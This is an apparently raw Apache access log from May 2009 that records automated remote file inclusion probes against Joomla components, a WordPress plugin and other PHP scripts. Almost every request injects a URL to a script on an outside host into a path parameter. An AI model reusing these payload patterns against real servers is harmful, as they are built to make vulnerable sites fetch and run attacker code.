86.122.170.50 - - [28/May/2009:15:49:13 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.1-zigzag.ru/id3.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
86.122.170.50 - - [28/May/2009:15:49:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.1-zigzag.ru/id3.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
70.38.31.50 - - [28/May/2009:15:51:11 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gwendan.phpnet.org/drukpa.europe/covoiturage/shizspider.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
70.38.31.50 - - [28/May/2009:15:51:11 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gwendan.phpnet.org/drukpa.europe/covoiturage/shizspider.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
86.122.170.50 - - [28/May/2009:15:51:48 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.1-zigzag.ru/id3.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
86.122.170.50 - - [28/May/2009:15:51:48 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.1-zigzag.ru/id3.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
86.122.170.50 - - [28/May/2009:15:52:02 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.1-zigzag.ru/id3.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
86.122.170.50 - - [28/May/2009:15:52:03 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.1-zigzag.ru/id3.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
208.103.111.2 - - [28/May/2009:15:52:30 -0500] "GET /logs//ashnews.php?pathtoashnews=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
208.103.111.2 - - [28/May/2009:15:52:30 -0500] "GET /logs/access_log.1241740800//ashnews.php?pathtoashnews=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.103.111.2 - - [28/May/2009:15:52:30 -0500] "GET //ashnews.php?pathtoashnews=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
208.103.111.2 - - [28/May/2009:15:52:30 -0500] "GET /logs/access_log.1242086400//ashnews.php?pathtoashnews=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
86.122.170.50 - - [28/May/2009:15:53:08 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.1-zigzag.ru/id3.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
86.122.170.50 - - [28/May/2009:15:53:08 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.1-zigzag.ru/id3.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
86.122.170.50 - - [28/May/2009:15:53:08 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.1-zigzag.ru/id3.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
86.122.170.50 - - [28/May/2009:15:53:08 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.1-zigzag.ru/id3.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.121.18.203 - - [28/May/2009:15:54:05 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
91.121.18.203 - - [28/May/2009:15:54:08 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
80.237.146.58 - - [28/May/2009:15:54:29 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.76"
80.237.146.58 - - [28/May/2009:15:54:30 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.76"
216.193.210.232 - - [28/May/2009:15:56:09 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
216.193.210.232 - - [28/May/2009:15:56:09 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.814"
91.121.18.203 - - [28/May/2009:15:56:39 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
91.121.18.203 - - [28/May/2009:15:56:39 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
80.237.146.58 - - [28/May/2009:15:56:43 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.76"
80.237.146.58 - - [28/May/2009:15:56:43 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.76"
216.193.210.232 - - [28/May/2009:15:56:53 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.814"
216.193.210.232 - - [28/May/2009:15:56:53 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.814"
216.193.210.232 - - [28/May/2009:15:57:05 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.814"
216.193.210.232 - - [28/May/2009:15:57:05 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.814"
216.193.210.232 - - [28/May/2009:15:57:36 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.814"
216.193.210.232 - - [28/May/2009:15:57:36 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.814"
91.121.18.203 - - [28/May/2009:15:57:36 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
91.121.18.203 - - [28/May/2009:15:57:36 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
91.121.18.203 - - [28/May/2009:15:57:40 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.808"
91.121.18.203 - - [28/May/2009:15:57:41 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.808"
80.237.146.58 - - [28/May/2009:15:58:05 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.76"
80.237.146.58 - - [28/May/2009:15:58:06 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.76"
80.237.146.58 - - [28/May/2009:15:58:24 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.76"
80.237.146.58 - - [28/May/2009:15:58:25 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.76"
91.121.18.203 - - [28/May/2009:15:58:33 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.808"
91.121.18.203 - - [28/May/2009:15:58:33 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.808"
65.98.80.2 - - [28/May/2009:15:59:24 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tlumacz-niemieckiego.net/gymspider.txt%0D?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
65.98.80.2 - - [28/May/2009:15:59:24 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tlumacz-niemieckiego.net/gymspider.txt%0D?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
80.237.146.58 - - [28/May/2009:16:00:02 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.76"
80.237.146.58 - - [28/May/2009:16:00:02 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.76"
83.143.81.26 - - [28/May/2009:16:02:10 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:02:10 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:02:10 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:02:11 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:02:11 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:02:11 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:02:27 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:02:34 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:02:56 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:02:56 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:02:56 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:02:56 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:02:57 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:02:57 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:03:00 -0500] "GET /logs/access_log.1236470400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:03:01 -0500] "GET /logs/access_log.1236470400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:16:03:20 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:16:03:20 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:16:03:24 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:16:03:49 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
222.239.227.229 - - [28/May/2009:16:04:33 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.irisjobstation.com/id2.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
222.239.227.229 - - [28/May/2009:16:04:34 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.irisjobstation.com/id2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
116.36.213.166 - - [28/May/2009:16:05:07 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.36.213.166 - - [28/May/2009:16:05:08 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
116.36.213.166 - - [28/May/2009:16:05:09 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
116.36.213.166 - - [28/May/2009:16:05:34 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
61.6.163.37 - - [28/May/2009:16:05:49 -0500] "GET /logs//ashnews.php?pathtoashnews=http://poisonx.ucoz.com/braid.txt?? HTTP/1.0" 404 288 "-""Mozilla/5.0"
61.6.163.37 - - [28/May/2009:16:05:49 -0500] "GET /logs/access_log.1242432000//ashnews.php?pathtoashnews=http://poisonx.ucoz.com/braid.txt?? HTTP/1.0" 404 310 "-""Mozilla/5.0"
61.6.163.37 - - [28/May/2009:16:05:49 -0500] "GET /logs/access_log.1242086400//ashnews.php?pathtoashnews=http://poisonx.ucoz.com/braid.txt?? HTTP/1.0" 404 310 "-""Mozilla/5.0"
61.6.163.37 - - [28/May/2009:16:05:49 -0500] "GET //ashnews.php?pathtoashnews=http://poisonx.ucoz.com/braid.txt?? HTTP/1.0" 404 283 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:16:06:40 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:16:06:40 -0500] "GET /?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:16:06:42 -0500] "GET /logs/?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:16:07:02 -0500] "GET /?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:16:07:02 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:16:07:07 -0500] "GET /logs/?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:16:07:26 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
213.151.175.10 - - [28/May/2009:16:10:01 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wadv.de/xtcommerce/images/tirid.txt%0D?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
213.151.175.10 - - [28/May/2009:16:10:04 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wadv.de/xtcommerce/images/tirid.txt%0D?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
61.6.163.37 - - [28/May/2009:16:10:38 -0500] "GET /logs/access_log.1241740800//ashnews.php?pathtoashnews=http://poisonx.ucoz.com/braid.txt?? HTTP/1.0" 404 310 "-""Mozilla/5.0"
213.151.175.10 - - [28/May/2009:16:11:43 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.wadv.de/xtcommerce/images/tirid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.151.175.10 - - [28/May/2009:16:11:43 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.wadv.de/xtcommerce/images/tirid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.38.243.71 - - [28/May/2009:16:12:14 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.188.91.69 - - [28/May/2009:16:12:31 -0500] "GET /logs//phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.188.91.69 - - [28/May/2009:16:12:31 -0500] "GET /logs/access_log.1238025600//phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
121.188.91.69 - - [28/May/2009:16:12:31 -0500] "GET /logs/access_log.1238371200//phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
121.188.91.69 - - [28/May/2009:16:12:31 -0500] "GET //phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.188.91.69 - - [28/May/2009:16:12:50 -0500] "GET /logs//phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.188.91.69 - - [28/May/2009:16:12:50 -0500] "GET /logs/access_log.1238025600//phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
121.188.91.69 - - [28/May/2009:16:12:51 -0500] "GET //phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.188.91.69 - - [28/May/2009:16:12:51 -0500] "GET /logs/access_log.1238371200//phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:16:12:59 -0500] "GET //phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:16:12:59 -0500] "GET /logs//phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:16:13:01 -0500] "GET /logs/access_log.1238025600//phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:16:13:01 -0500] "GET /logs/access_log.1238371200//phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:16:13:27 -0500] "GET /logs/access_log.1238371200//phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:16:13:28 -0500] "GET //phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:16:13:28 -0500] "GET /logs//phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:16:13:30 -0500] "GET /logs/access_log.1238025600//phporacleview/inc/include_all.inc.php?page_dir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:13:41 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:13:41 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:13:41 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:13:41 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:13:41 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
83.143.81.26 - - [28/May/2009:16:13:41 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:16:13:53 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:16:13:53 -0500] "GET /?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:16:13:55 -0500] "GET /logs/?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:16:13:57 -0500] "GET /?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:16:13:57 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:16:14:02 -0500] "GET /logs/?DOCUMENT_ROOT=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
207.213.245.215 - - [28/May/2009:16:15:00 -0500] "GET //phporacleview/inc/include_all.inc.php?page_dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
85.17.162.28 - - [28/May/2009:16:15:08 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:16:15:08 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:16:15:13 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
213.151.175.10 - - [28/May/2009:16:15:29 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.wadv.de/xtcommerce/images/tirid.txt%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
213.151.175.10 - - [28/May/2009:16:15:29 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.wadv.de/xtcommerce/images/tirid.txt%0D?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
121.188.91.69 - - [28/May/2009:16:16:13 -0500] "GET /logs/access_log.1241654400//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
